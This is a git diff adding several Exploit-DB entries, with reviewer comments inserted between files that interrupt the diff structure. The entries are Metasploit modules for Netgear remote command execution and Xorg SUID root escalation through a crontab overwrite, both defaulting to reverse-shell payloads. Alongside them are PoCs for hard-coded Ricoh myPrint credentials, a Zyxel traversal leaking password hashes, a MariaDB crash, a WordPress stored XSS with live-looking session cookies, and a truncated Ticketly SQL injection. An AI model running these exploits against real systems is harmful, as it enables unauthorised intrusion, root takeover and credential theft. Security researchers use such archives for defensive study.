diff --git a/exploits/hardware/remote/45909.rb b/exploits/hardware/remote/45909.rb
new file mode 100755
index 000000000..dbad30230
--- /dev/null
+++ b/exploits/hardware/remote/45909.rb
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Netgear Devices Unauthenticated Remote Command Execution',
+ 'Description' => %q{
+ From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
+ (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
+ Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
+ WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
+ arbitrary commands.
+ },
+ 'Author' =>
+ [
+ 'Daming Dominic Chen ', # Vuln discovery
+ 'Imran Dawoodjee ' # MSF module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2016-1555'],
+ ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
+ ['PACKETSTORM', '135956'],
+ ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
+ ],
+ 'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
+ 'Privileged' => true,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE,
+ 'Payload' => {},
+ 'DefaultOptions' => {
+ 'CMDSTAGER::FLAVOR' => 'wget',
+ 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
+ 'WfsDelay' => 10 },
+ 'Targets' => [['Automatic', { }]],
+ 'CmdStagerFlavor'=> %w{ echo printf wget },
+ 'DefaultTarget' => 0
+ ))
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
+ OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
+ ])
+ end
+
+ # check for vulnerability existence
+ def check
+ fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response
+ res = execute_command("echo #{fingerprint}") # the raw POST response
+
+ unless res
+ vprint_error 'Connection failed'
+ return CheckCode::Unknown
+ end
+
+ unless res.code == 200
+ return CheckCode::Safe
+ end
+
+ unless res.get_html_document.at('input').to_s.include? fingerprint
+ return CheckCode::Safe
+ end
+
+ CheckCode::Vulnerable
+ end
+
+ # execute a command, or simply send a POST request
+ def execute_command(cmd, opts = {})
+ vars_post = {
+ 'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",
+ 'reginfo' => '1',
+ 'writeData' => 'Submit'
+ }
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'headers' => { 'Connection' => 'Keep-Alive' },
+ 'uri' => normalize_uri(target_uri.path),
+ 'vars_post' => vars_post
+ })
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
+ end
+
+ # the exploit method
+ def exploit
+ #run a check before attempting to exploit
+ unless [CheckCode::Vulnerable].include? check
+ fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+ end
+
+ execute_cmdstager(linemax: 2048) # maximum 130,000
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45899.txt b/exploits/hardware/webapps/45899.txt
new file mode 100644
index 000000000..7fec34d8e
--- /dev/null
+++ b/exploits/hardware/webapps/45899.txt
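Review bot: `check` can never report `CheckCode::Unknown` for a refused connection, because `execute_command` rescues `::Rex::ConnectionError` and calls `fail_with(Failure::Unreachable, ...)`, which raises out of `check` before the `unless res` guard is reached; a check method is expected to return Unknown rather than abort the run. In the rescue branch use `vprint_error("#{peer} - Failed to connect to the target!")` followed by `return nil`, so `check` falls into its existing nil handling and `exploit` still fails through its own `fail_with`. While there, `unless [CheckCode::Vulnerable].include? check` in `exploit` is an odd way to spell `unless check == CheckCode::Vulnerable`. The fingerprint match only inspects the first `<input>` element of the response (`get_html_document.at('input')`), which is worth a one-line comment since a reader will otherwise assume the whole body is searched.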
@@ -0,0 +1,283 @@ +# Exploit Title: Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials +# Google Dork: intitle:"ricoh myprint" "Copyright Ricoh. All Rights Reserved" +# Date: 2018-11-19 +# Exploit Author: Hodorsec +# Vendor Homepage: https://www.ricoh.com +# Software Link: https://www.ricoh-europe.com/support/product-support/software-support-detail.html?prodId=100-13203 +# Versions: +# myPrint - Windows client version 2.9.2.4 +# myPrint - Android client version 2.2.7 +# Tested on: Ricoh myPrint clients and WSDL webservice +# WSDL URL format: https://{HOST}/RicohmyPrint/MyPrintWebService.asmx?wsdl +# CVE: N/A + +# Description: +# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for Android +# give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering +# API secrets of related Google cloud printers, encrypted passwords of mail servers and +# names of printed files. + +# Additional Information: +# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for +# Android (reverse-engineered, identical credentials), gives access +# to any externally disclosed Ricoh myPrint WSDL API. Using the found credentials, several info can be obtained, such as: +# * Show settings such as local paths, used mailserver, mailaddresses for POP/IMAP and encrypted passwords (appears to be stream-based +# encrypted, seeing different lengths of base64 hashes passwords (Algorithm yet unknown)). 
--> ReadMobileSettings +# * Checks if a password is valid for ANY known user; returns "true" if password is valid for a known user --> IsPasswordValid +# * Shows all user info such as ID, name by looking up email alias --> IdentifierByEmailAlias +# * Show used internal IP addresses and TCP ports of related printers/server for Ricoh myPrint +# * Show related Google cloud printers with API secrets --> ReadGoogleCloudPrinters +# * Show all printjob-statuses with filenames --> GetJobList +# * Show related organizations --> ReadOrganizations + +# Affected Components: +# * Tested Ricoh myPrint clients with indicated versions and probably any remotely accessible myPrint webserver with an accessible WSDL API. + +# Affected Code: +# * Android client "WebService.java" +...... +public static final class +{ + + public static final String AUTH_PASS = "Kyg63WfC"; + public static final String AUTH_USER = "ricohmyprint"; + public static final String NS_RICOH = "http://RicohmyPrint.com/"; + public static final String NS_SOAP12 = "http://www.w3.org/2003/05/soap-envelope"; + public static final String PRE_RICOH = "ric"; + public static final String PRE_SOAP12 = "soap"; + public static final String SERVICE = "/RicohmyPrint/myprintwebservice.asmx"; + public static final String SUPPORTED_LANGS[] = { + "en", "ca", "de", "es", "fr", "it", "nl", "no", "pl", "pt", + "sv" + }; +...... + +Attack Type: + * Remote + +Attack Vectors: +Steps: + * Download the Android APK or Windows executable installer + * Reverse engineer the APK or DLL's from the Windows installer + * Look for the string "PASS" with a regex tool, which should pop up a hit + * Access the WSDL on a reachable Ricoh myPrint environment and enumerate operations with a SOAP tool (e.g. 
"ReadMobileSettings") + * Use any operation, substitute the "AuthSoapHd" values for UserName and Password with the found credentials + * Perform the request and check results + +Hardcoded Credentials: + * Username: ricohmyprint + * Password: Kyg63WfC + +Header requirement: +Required for using in an SOAP WSDL POST message as a header with values: + + + + + + + + + + +Examples: + * ReadMobileSettings +--------------------------------------------- +REQUEST + + + + + + + + + + + + + + + +RESPONSE + + + + + + C:\ProgramData\RICOH\WatchFolder + C:\ProgramData\RICOH\ProcessFolder + C:\ProgramData\RICOH\WebUploadFolder + 0 + myPrintToFile + RICOH Aficio MP C3500 PCL 6 + + SINGLE + 5 + POP3 + pop.someserver.local + 110 + true + print@someserver.local + REDACTED + + + 5 + false + + + smtp.someserver.local + 25 + Ricoh myPrint + someuser@someserver.local + false + + REDACTED + + + 0 + 80 + false + + 5 + 1080 + + + 0 + false + postmaster + + + + + +--------------------------------------------- + + * IdentifierByEmailAlias +--------------------------------------------- +REQUEST: + + + + + + + + + + + + + + admin + + + + +RESPONSE: + + + + + true + + 1337 + 83e754ff-fa1d-48b6-adb2-7cb60a22476d + admin + someuser@someserver.local + 1osd9KJ + 5 + € 5,00 + 123456 + + 1 + false + true + false + + + GB + + 0 + TwoSidedLongEdge + Monochrome + true + true + StapleTopLeft + One + true + true + + + IDPLocal + false + false + + 1 + 1 + LPR + Default printer + 127.0.0.1 + lp + 515 + true + 0 + true + + + + + + + + +--------------------------------------------- + +Soap Endpoints: + * ApplyAgreementAcceptance + * ChangePassword + * ClearCache + * CreateAccount + * CreateAccountByCardId + * FinishedJobProcessing + * GetConditionsUri + * GetImage + * GetJobList + * GetLanguageTable + * GetPrintCapabilities + * GetPrintQueueRuleResult + * GetSupportUri + * IdentifierByEmailAlias + * IsPasswordValid + * LogIn + * Operation + * ReadAccount + * ReadGoogleCloudPrinters + * ReadMobileSettings + * 
ReadMpPrintQueues
+ * ReadOrganizations
+ * ReadSettings
+ * ReSendPincode
+ * ResetPassword
+ * RetrieveCloudPrintJobsAllowed
+ * RetrieveEmailAllowed
+ * SendCancelPrintJob
+ * SendHeartbeat
+ * SendPrinterName
+ * Test
+ * UpdateAccount
+ * UpdateGoogleCloudPrinter
+ * UploadFile
+ * UploadFileAndPrintTicket
+ * VerifyJobProcessing
+ * VoucherToCash
+ * WaitingJob
+ * WriteLog
+
+Disclosure Timeline using CERT/CC disclosure policy:
+ - 04-10-18: Requested CVE
+ - 05-10-18: Contacted vendor for initial contact, used several publicly known mailaddresses
+ - 10-10-18: Contacted CERT for Vulnerability Disclosure coordination due to no response from vendor
+ - 22-10-18: CERT responded it received no response on their behalf from vendor
+ - 22-10-18: Sent reminder to vendor
+ - 19-11-18: Public Disclosure
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45904.txt b/exploits/hardware/webapps/45904.txt
new file mode 100644
index 000000000..de8fe232c
--- /dev/null
+++ b/exploits/hardware/webapps/45904.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
+# Date: 2018-11-17
+# Exploit Author: numan türle
+# Vendor Homepage: https://www.zyxel.com/
+# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
+# Tested on: macOS
+# Fixed firmware: 5.13(AAXA.8)C0
+
+# PoC
+@modem_gateway = "192.168.1.1" // default address
+
+http://@modem_gateway/../../../../../../../../../../../../etc/passwd
+
+here are the contents :
+
+############################## contents ##############################
+nobody:x:99:99:nobody:/nonexistent:/bin/false
+root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
+supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
+admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
+user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh
\ No newline at end of file
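Review bot: The advisory offers no workaround even though the vendor never responded, and the Google dork in the header indicates these `MyPrintWebService.asmx` endpoints are reachable from the internet. Because the credentials are compiled into every client they cannot be rotated by an operator, so the only mitigations a site has are to keep the `.asmx` endpoint off the public internet (VPN or source-IP allow-list in front of it) and to alert on SOAP requests whose `AuthSoapHd` carries `UserName` `ricohmyprint` from anything other than known client addresses — especially calls to `IsPasswordValid`, which the text itself describes as a password oracle for any known user. A short "Mitigation / Detection" paragraph stating that would make the report actionable for defenders, not just attackers. The header block also claims "CVE: N/A" while the timeline says a CVE was requested on 04-10-18; one of the two should be updated.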
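Review bot: The PoC URL `http://@modem_gateway/../../../../../../etc/passwd` will not reach the device as written: browsers and most HTTP libraries collapse `..` segments before sending the request, and the leading `@` makes `modem_gateway` parse as URL userinfo rather than a host placeholder. State the tool and exact form that worked, e.g. `curl --path-as-is http://192.168.1.1/../../../../../../etc/passwd`, or the percent-encoded `%2e%2e%2f` variant if that is what was sent. The five `/etc/passwd` entries carry 13-character hashes that look like traditional DES `crypt(3)` output, which is cheap to crack offline; a sentence noting that these are firmware-default accounts (`root`, `supervisor`, `admin`, `user`) and that the traversal therefore yields usable login material would make the impact clear instead of leaving it implicit.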
diff --git a/exploits/linux/dos/45901.txt b/exploits/linux/dos/45901.txt
new file mode 100644
index 000000000..715666424
--- /dev/null
+++ b/exploits/linux/dos/45901.txt
@@ -0,0 +1,63 @@
+# Exploit Title: MariaDB Client 10.1.26 - Denial of Service (PoC)
+# Google Dork: None
+# Date: 2018-11-16
+# Exploit Author: strider
+# Software Link: https://github.com/MariaDB/server
+# Version: mysql Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
+# Tested on: Debian 9 Stretch x64 / Ubuntu 18.04 x86_64
+# CVE : None
+
+# Description:
+# MariaDB uses environment variables. The PAGER variable is vulnerable to a bufferoverflow.
+# If the environment variable PAGER is greater or equals 512 characters it will crash and make client unusable.
+
+# This is caused by a the function strmov which takes all from source and copy that
+# into destination which have a fixed size.
+
+Codepart:
+static char default_pager[FN_REFLEN];
+
+char *tmp=getenv("PAGER");
+if (tmp && strlen(tmp))
+{
+ default_pager_set= 1;
+ strmov(default_pager, tmp);
+}
+
+
+Proof of Concept:
+
+Step 1:
+
+export PAGER=$(python -c "print '\x41' * 512")
+
+Step 2:
+
+mariadb -u user -p
+
+Crash
+
+---------------------------------------------------------------------
+peda output:
+
+Program received signal SIGSEGV, Segmentation fault.
+
+[----------------------------------registers-----------------------------------]
+RAX: 0x555555b73600 ('A' ...)
+RBX: 0x555555b7cbc8 ('A' ...)
+RCX: 0x70 ('p')
+RDX: 0x0
+RSI: 0x555555bafe40 ('A' ...)
+RDI: 0x555555bb0040
+RBP: 0x7fffffffdfa0 --> 0x555555639a80 (<__libc_csu_init>: push r15)
+RSP: 0x7fffffffdd48 --> 0x55555558e5bc (: mov rax,QWORD PTR [r12])
+RIP: 0x7ffff677e2e6 (<__strcpy_sse2_unaligned+374>: movdqu XMMWORD PTR [rdi-0x40],xmm4)
+R8 : 0x555555b92580 ('A' ...)
+R9 : 0x20 (' ')
+R10: 0x7fffffffa5a0 --> 0x7fffffffa5d0 --> 0x7fffffffdb80 --> 0x7fffffffdc10 --> 0x0
+R11: 0x7ffff6846d68 --> 0xfff37778fff37768
+R12: 0x555555b00bc0 --> 0x555555b00b80 --> 0x40000000 ('')
+R13: 0x7ffff6a846e8 --> 0x7ffff6a84600 --> 0xfbad2084
+R14: 0x0
+R15: 0x0
+EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
\ No newline at end of file
diff --git a/exploits/multiple/local/45908.rb b/exploits/multiple/local/45908.rb
new file mode 100755
index 000000000..a7dc27950
--- /dev/null
+++ b/exploits/multiple/local/45908.rb
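Review bot: The advisory never states the trust boundary: `PAGER` is read from the client's own environment via `getenv`, so a user can only crash their own `mariadb` process, and this is a self-inflicted DoS unless the client runs setuid or an attacker can influence another user's environment (a wrapper script, a CI job, `ssh` `SendEnv`/`AcceptEnv`). That caveat belongs next to `# CVE : None` so readers do not triage it as a remote or privilege-boundary issue. The root cause shown is `strmov(default_pager, tmp)` copying an unbounded `getenv` result into `default_pager[FN_REFLEN]`; the fix to recommend is a length-bounded copy that truncates at `FN_REFLEN - 1` and NUL-terminates, and the PoC's 512-byte threshold only holds if `FN_REFLEN` is 512 on the tested build, which the text should say explicitly. The register dump also shows the fault inside `__strcpy_sse2_unaligned`, which supports the claim that `strmov` is an unbounded `strcpy`-style copy and is worth one sentence of explanation for readers who skip the disassembly.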
@@ -0,0 +1,215 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = GoodRanking
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+ include Msf::Post::File
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::Kernel
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Xorg X11 Server SUID privilege escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges with SUID Xorg X11 server
+ versions 1.19.0 < 1.20.3.
+
+ A permission check flaw exists for -modulepath and -logfile options when
+ starting Xorg. This allows unprivileged users that can start the server
+ the ability to elevate privileges and run arbitrary code under root
+ privileges.
+
+ This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).
+ CentOS default install will require console auth for the users session.
+ Cron launches the payload so if Selinux is enforcing exploitation
+ may still be possible, but the module will bail.
+ Xorg must have SUID permissions and may not start if running.
+
+ On exploitation a crontab.old backup file will be created by Xorg.
+ This module will remove the .old file and restore crontab after
+ successful exploitation. Failed exploitation may result in a corrupted
+ crontab. On successful exploitation artifacts will be created consistant
+ with starting Xorg and running a cron.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Narendra Shinde', # Discovery and exploit
+ 'Raptor - 0xdea', # Modified exploit for cron
+ 'Aaron Ringo', # Metasploit module
+ 'Brendan Coles ' # Metasploit module
+ ],
+ 'DisclosureDate' => 'Oct 25 2018',
+ 'References' =>
+ [
+ [ 'CVE', '2018-14665' ],
+ [ 'BID', '105741' ],
+ [ 'EDB', '45697' ],
+ [ 'EDB', '45742' ],
+ [ 'EDB', '45832' ],
+ [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
+ [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
+ ],
+ 'Platform' => %w[openbsd linux],
+ 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+ 'SessionTypes' => %w[shell meterpreter],
+ 'Targets' =>
+ [
+ ['OpenBSD', {
+ 'Platform' => 'unix',
+ 'Arch' => [ ARCH_CMD ] } ],
+ ['Linux x64', {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X64 ] } ],
+ ['Linux x86', {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ] } ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'cmd/unix/reverse_openssl',
+ 'WfsDelay' => 120
+ },
+ 'DefaultTarget' => 0))
+
+ register_advanced_options(
+ [
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+ OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
+ OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])
+ ]
+ )
+ end
+
+
+ def check
+
+ # linux checks
+ uname = cmd_exec "uname"
+ if uname =~ /linux/i
+ vprint_status "Running additional check for Linux"
+ if datastore['ConsoleLock']
+ user = cmd_exec "id -un"
+ unless exist? "/var/run/console/#{user}"
+ vprint_error "No console lock for #{user}"
+ return CheckCode::Safe
+ end
+ vprint_good "Console lock for #{user}"
+ end
+ if selinux_installed?
+ if selinux_enforcing?
+ vprint_error 'Selinux is enforcing'
+ return CheckCode::Safe
+ end
+ end
+ vprint_good "Selinux is not an issue"
+ end
+
+ # suid program check
+ xorg_path = cmd_exec "command -v Xorg"
+ unless xorg_path.include?("Xorg")
+ vprint_error "Could not find Xorg executable"
+ return CheckCode::Safe
+ end
+ vprint_good "Xorg path found at #{xorg_path}"
+ unless setuid? xorg_path
+ vprint_error "Xorg binary #{xorg_path} is not SUID"
+ return CheckCode::Safe
+ end
+ vprint_good "Xorg binary #{xorg_path} is SUID"
+
+ # version check
+ x_version = cmd_exec "Xorg -version"
+ if x_version.include?("Release Date")
+ v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
+ unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
+ vprint_error "Xorg version #{v} not supported"
+ return CheckCode::Safe
+ end
+ elsif x_version.include?("Fatal server error")
+ vprint_error "User probably does not have console auth"
+ vprint_error "Below is Xorg -version output"
+ vprint_error x_version
+ return CheckCode::Safe
+ else
+ vprint_warning "Could not parse Xorg -version output"
+ return CheckCode::Appears
+ end
+ vprint_good "Xorg version #{v} is vulnerable"
+
+ # process check for /X
+ proc_list = cmd_exec "ps ax"
+ if proc_list.include?('/X ')
+ vprint_warning('Xorg in process list')
+ return CheckCode::Appears
+ end
+ vprint_good('Xorg does not appear running')
+ return CheckCode::Vulnerable
+ end
+
+ def on_new_session(session)
+ if session.type.to_s.eql? 'meterpreter'
+ session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+ session.sys.process.execute '/bin/sh', "-c \"#{@clean_up}\""
+ else
+ session.shell_command(@clean_up)
+ end
+ print_good "Returning session after cleaning"
+ ensure
+ super
+ end
+
+ def exploit
+
+ check_status = check
+ if check_status == CheckCode::Appears
+ print_warning 'Could not get version or Xorg process possibly running, may fail'
+ elsif check_status == CheckCode::Safe
+ fail_with Failure::NotVulnerable, 'Target not vulnerable'
+ end
+
+ if is_root?
+ fail_with Failure::BadConfig, 'This session already has root privileges'
+ end
+
+ unless writable? datastore['WritableDir']
+ fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+ end
+
+ print_good 'Passed all initial checks for exploit'
+
+ pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
+ @clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old"
+ xdisplay = datastore['Xdisplay']
+
+ # Uploading file crontab will run
+ print_status 'Uploading your payload, this could take a while'
+ if payload.arch.first == 'cmd'
+ write_file(pscript, payload.encoded)
+ else
+ write_file(pscript, generate_payload_exe)
+ end
+ register_file_for_cleanup pscript
+ chmod pscript
+
+ # Exploit steps on crontab so backing it up
+ cmd_exec "cat /etc/crontab > #{pscript}.b"
+ # Actual exploit with cron overwrite
+ print_status 'Trying /etc/crontab overwrite'
+ cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
+ Rex.sleep 5
+ cmd_exec "pkill Xorg"
+ Rex.sleep 1
+ cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
+ unless cron_check.include? pscript
+ rm_f "#{pscript}.b"
+ print_error 'Deleting crontab backup'
+ fail_with Failure::NotVulnerable, '/etc/crontab not modified'
+ end
+ print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
+ end
+end
\ No newline at end of file
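Review bot: In `exploit` the launch string `"cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"` places the redirect after the `&`, so it applies to an empty command and Xorg's own output is not discarded; the intended form is `... -logfile crontab #{xdisplay} >/dev/null 2>&1 &`. The follow-up `cmd_exec "pkill Xorg"` kills every Xorg on the host rather than the one this module started, yet `check` only downgrades to `CheckCode::Appears` when `ps ax` already shows `/X `, and `exploit` then proceeds with a warning — either refuse in that case or record the PID of the launched process and kill that. Finally, the crontab entry keeps running `#{pscript}` as root every minute until a session arrives and `on_new_session` runs `@clean_up`; if the callback never connects the host is left executing the payload indefinitely with a corrupted crontab, so the `WfsDelay` timeout path could run the same restore command before giving up.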
diff --git a/exploits/php/webapps/45900.txt b/exploits/php/webapps/45900.txt
new file mode 100644
index 000000000..64c46f034
--- /dev/null
+++ b/exploits/php/webapps/45900.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Wordpress Plugins Easy Testimonials 3.2 - Cross-Site Scripting
+# Date: 2018-11-23
+# Exploit Author: En_dust
+# Vendor Homepage: https://wordpress.org/plugins/easy-testimonials/
+# Software Link: https://wordpress.org/plugins/easy-testimonials/
+# Version: 3.2
+# CVE : N/A
+# Tested on: Windows 10 x64
+
+# description:
+# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2.
+# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting.
+
+# POC
+# XSS Stored
+
+POST http://localhost/wp-admin/post.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 2152
+Referer: http://localhost/wp-admin/post-new.php?post_type=testimonial&wp-post-new-reload=true
+Cookie: wp-saving-post=25-check; wp-saving-post=22-saved; wordpress_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C481919de475c08441e455ffe01f4b8a241ea13f3a4255be476841ddc281597bc; wp-settings-time-1=1542959022; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26posts_list_mode%3Dexcerpt; PHPSESSID=au6fo2rac6sn2hgk0mnniq17k2; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C9bce6802e21d94bc37ab3eabf8dfe2950603d327e32a8ad14e167b4550d036dc
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+
+_wpnonce=b3ca69b020&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=testimonial&original_post_status=auto-draft&referredby=&_wp_original_http_referer=&auto_draft=&post_ID=25&meta-box-order-nonce=c25a6e37b2&closedpostboxesnonce=4784cc9ba9&post_title=test&samplepermalinknonce=f39f8eec26&content=test&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&aa=2018&mm=11&jj=23&hh=17&mn=12&ss=56&hidden_mm=11&cur_mm=11&hidden_jj=23&cur_jj=23&hidden_aa=2018&cur_aa=2018&hidden_hh=17&cur_hh=17&hidden_mn=12&cur_mn=12&original_publish=%E5%8F%91%E5%B8%83&publish=%E5%8F%91%E5%B8%83&tax_input%5Beasy-testimonial-category%5D%5B%5D=0&neweasy-testimonial-category=%E6%96%B0%E5%88%86%E7%B1%BB%E7%9B%AE%E5%BD%95%E5%90%8D&neweasy-testimonial-category_parent=-1&_ajax_nonce-add-easy-testimonial-category=50d8975094&my-custom-fields_wpnonce=b074ff3409&_ikcf_client=[XSS]&_ikcf_email=test%40test.com&_ikcf_position=[XSS]&_ikcf_other=[XSS]&_ikcf_rating=1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=81df7811e1&post_name=&post_grid_post_settings_input_nonce=95c656b2da&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&post_grid_post_settings%5Bpost_skin%5D=flat&post_grid_post_settings%5Bcustom_thumb_source%5D=http%3A%2F%2Fwww.wordpress.com%2Fwp-content%2Fplugins%2Fpost-grid%2Fassets%2Ffrontend%2Fcss%2Fimages%2Fplaceholder.png&post_grid_post_settings%5Bfont_awesome_icon%5D=&post_grid_post_settings%5Bfont_awesome_icon_color%5D=737272&post_grid_post_settings%5Bfont_awesome_icon_size%5D=50px&post_grid_post_settings%5Bcustom_youtube_id%5D=&post_grid_post_settings%5Bcustom_vimeo_id%5D=&post_grid_post_settings%5Bcustom_dailymotion_id%5D=&post_grid_post_settings%5Bcustom_mp3_url%5D=&post_grid_post_settings%5Bcustom_soundcloud_id%5D= \ No newline at end of file 
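Review bot: The PoC is an authenticated request from the `admin` account (the `wordpress_logged_in_...=admin` cookie and the `_wpnonce`/`my-custom-fields_wpnonce` fields), and on a single-site WordPress install administrators hold the `unfiltered_html` capability, so storing `<script>` in a post-meta field from that account is expected behaviour and does not by itself cross a privilege boundary. To demonstrate a vulnerability the report needs to name the lowest role that can create a testimonial and have the payload rendered to other users — e.g. a Contributor or Author without `unfiltered_html` — and say where `_ikcf_client`, `_ikcf_position` and `_ikcf_other` are echoed unescaped (presumably the front-end shortcode or widget output; not shown here). The request also embeds live session cookies, a `PHPSESSID` and nonces; replace them with placeholders such as `Cookie: [REDACTED]` and `_wpnonce=[NONCE]`, since they are useless to readers and a bad habit in published PoCs.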
diff --git a/exploits/php/webapps/45902.txt b/exploits/php/webapps/45902.txt
new file mode 100644
index 000000000..ecb39c32d
--- /dev/null
+++ b/exploits/php/webapps/45902.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Ticketly 1.0 – Multiple SQL Injection
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-11-19
+# Google Dork: N/A
+# Vendor: Abisoft (https://abisoftgt.net)
+# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
+# Affected Version: 1.0
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: Windows & Ubuntu
+# Tested on: Win10x64 & Kali Linux
+# CVE: 2018-18923
+
+# 1. Technical Description:
+# Ticketly 1.0 are affected by SQL Injection in multiple parameters and
+# resources through POST. This allows a attacker to read and modify
+# sensitive information from the database used by the application.
+
+# 2. Proof Of Concept (PoC):
+# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)
+---
+POST /ticketly/action/addproject.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/ticketly/projects.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Connection: close
+
+name=Test%22&description=Test
+---
+
+# 2.2 In another request, add two ' to receive a code 200 OK
+---
+POST /ticketly/action/addproject.php HTTP/1.1
+Host: localhost
